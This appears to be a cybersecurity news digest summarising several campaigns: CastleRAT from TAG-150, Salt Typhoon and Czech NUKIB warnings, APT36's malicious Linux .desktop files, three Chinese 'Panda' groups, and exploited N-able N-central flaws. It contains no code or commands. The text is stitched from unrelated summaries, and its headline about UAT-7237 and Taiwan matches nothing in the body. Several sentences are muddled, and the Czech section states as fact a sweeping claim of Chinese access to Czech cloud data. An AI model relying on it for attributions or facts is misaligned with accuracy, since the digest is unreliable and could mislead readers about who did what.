UAT-7237 Targets Taiwan Web Infrastructure with Customized Open-Source Tools

The threat actor TAG-150, known for CastleLoader malware, has developed a new remote access trojan named CastleRAT. CastleRAT is available in both Python and C variants, and it is used to collect system information, execute commands, and download additional payloads. CastleRAT's development began in March 2025, and it is part of a multi-tiered infrastructure used by TAG-150. The malware is distributed through phishing attacks, fraudulent GitHub repositories, and other methods. The Python variant, also known as PyNightshade, and the C variant have different capabilities. The C variant includes keylogging, screenshot capture, file upload/download, and cryptocurrency clipper functionality. CastleRAT uses Steam Community profiles as dead drop resolvers for command-and-control (C2) servers. TAG-150 has been active since at least March 2025, using CastleLoader as an initial access vector for various secondary payloads, including remote access trojans, information stealers, and other loaders. TAG-150's operations have targeted critical infrastructure, including U.S. government agencies, and have been linked to a Play Ransomware attack against a French organization. The group's MaaS operation is likely promoted within closed circles, indicating a sophisticated and connected user base. TAG-150 is likely to develop and release additional malware in the near term and expand its distribution efforts.

Chinese state-sponsored Advanced Persistent Threat (APT) actors, specifically the group known as Salt Typhoon, have been conducting a sustained campaign to gain long-term access to critical infrastructure networks worldwide. This campaign targets telecommunications, transportation, lodging, and military networks, exploiting vulnerabilities in routers and taking steps to evade detection and maintain persistent access. The Cybersecurity and Infrastructure Security Agency (CISA), in coordination with the National Security Agency (NSA), Federal Bureau of Investigation (FBI), and international partners, released a joint advisory detailing this ongoing malicious activity. The advisory provides actionable guidance and intelligence to help organizations defend against these sophisticated cyber threats. The advisory builds on previous reporting and incorporates updated threat intelligence from investigations conducted through August 2025, reflecting overlapping indicators with industry reporting on various Chinese state-sponsored threat groups. Salt Typhoon has been active since at least 2019, targeting at least 600 organizations, including 200 in the U.S., and 80 countries. The Czech Republic's National Cyber and Information Security Agency (NUKIB) issued a warning about data transfers to China, highlighting concerns over the transfer of system and user data to the PRC and the remote administration of technical assets. The Czech government previously accused China of targeting its critical infrastructure through APT 31, which began in 2022. China's offensive cyber activities include large-scale telco attacks by Salt Typhoon and positioning for potential destructive cyberattacks. The advisory tracks this cluster of activity to multiple advanced persistent threats (APTs), though it partially overlaps with Salt Typhoon. The advisory details how state-backed threat actors, including Salt Typhoon, penetrate networks around the world, as well as how defenders can protect their own environments. The Czech Republic's National Cyber and Information Security Agency (NUKIB) has assessed the risk of significant disruptions caused by China at a 'High' level, indicating a high probability of occurrence. NUKIB confirmed malicious activities of Chinese cyber-actors targeting the Czech Republic, including a recent APT31 campaign targeting the Czech Ministry of Foreign Affairs. The Chinese government has access to data stored by private cloud service providers within the Czech Republic, ensuring that sensitive data is always within its reach. NUKIB warns about consumer devices, such as smartphones, IP cameras, electric cars, large language models, and even medical devices and photovoltaic converters manufactured by Chinese firms, as risky devices that can transfer potentially sensitive data to Chinese infrastructure. 45 previously unreported domains associated with Salt Typhoon and UNC4841 have been discovered, with the oldest domain registration activity dating back to May 2020.

APT36, a Pakistani cyber espionage group, is actively exploiting Linux .desktop files to deliver malware in attacks targeting government and defense entities in India. The campaign, which began on August 1, 2025, uses phishing emails to distribute ZIP archives containing malicious .desktop files disguised as PDFs. These files execute a payload that establishes persistent access and exfiltrates data. The attack leverages the 'Exec=' field in .desktop files to run shell commands, fetching and executing a hex-encoded payload from attacker-controlled servers or Google Drive. The payload is a Go-based ELF executable designed for espionage, capable of maintaining stealth and setting up persistence through cron jobs and systemd services. Communication with the command and control (C2) server is conducted over a bi-directional WebSocket channel. APT36 has also been observed targeting Windows and BOSS Linux systems, using spoofed domains and infrastructure hosted on Pakistan-based servers to steal credentials and 2FA codes.

Chinese cyber espionage groups Murky Panda, Genesis Panda, and Glacial Panda have escalated their activities targeting cloud and telecom sectors. Murky Panda exploits trusted cloud relationships and zero-day vulnerabilities to breach enterprise networks. They also compromise cloud service providers to gain access to downstream customer environments. Genesis Panda targets cloud services for lateral movement and persistence. Glacial Panda focuses on telecom organizations to exfiltrate call detail records and related telemetry. Murky Panda, also known as Silk Typhoon, has been active since at least 2021, targeting government, technology, academic, legal, and professional services entities in North America. They exploit internet-facing appliances, SOHO devices, and known vulnerabilities in Citrix and Commvault to gain initial access. They deploy web shells and custom malware like CloudedHope to maintain persistence. Genesis Panda, active since January 2024, targets financial services, media, telecommunications, and technology sectors across 11 countries. They exploit cloud-hosted systems for lateral movement and persistence, using compromised credentials to burrow deeper into cloud accounts. Glacial Panda has seen a 130% increase in activity targeting the telecom sector, focusing on Linux systems and legacy operating systems. They exploit known vulnerabilities and weak passwords to gain access and deploy trojanized OpenSSH components for credential harvesting.

Two vulnerabilities in N-able N-central, an RMM platform for MSPs, are being actively exploited. The flaws, CVE-2025-8875 and CVE-2025-8876, allow for command execution and command injection. N-able released patches in versions 2025.3.1 and 2024.6 HF2 on August 13, 2025. The U.S. CISA added these vulnerabilities to its KEV catalog, urging agencies to apply fixes by August 20, 2025. The vulnerabilities require authentication to exploit, and exploitation has been observed in a limited number of on-premises environments. N-able has not seen evidence of exploitation in its hosted cloud environments. The vulnerabilities affect Windows, Apple, and Linux endpoints managed by N-central. Over 800 N-able N-central servers remain unpatched, with approximately 2,000 instances exposed online. Shadowserver Foundation is tracking 880 vulnerable servers, mostly in the U.S., Canada, and the Netherlands. N-able has communicated the hotfix to all N-central customers and has committed to updating customers with additional information as their investigation continues.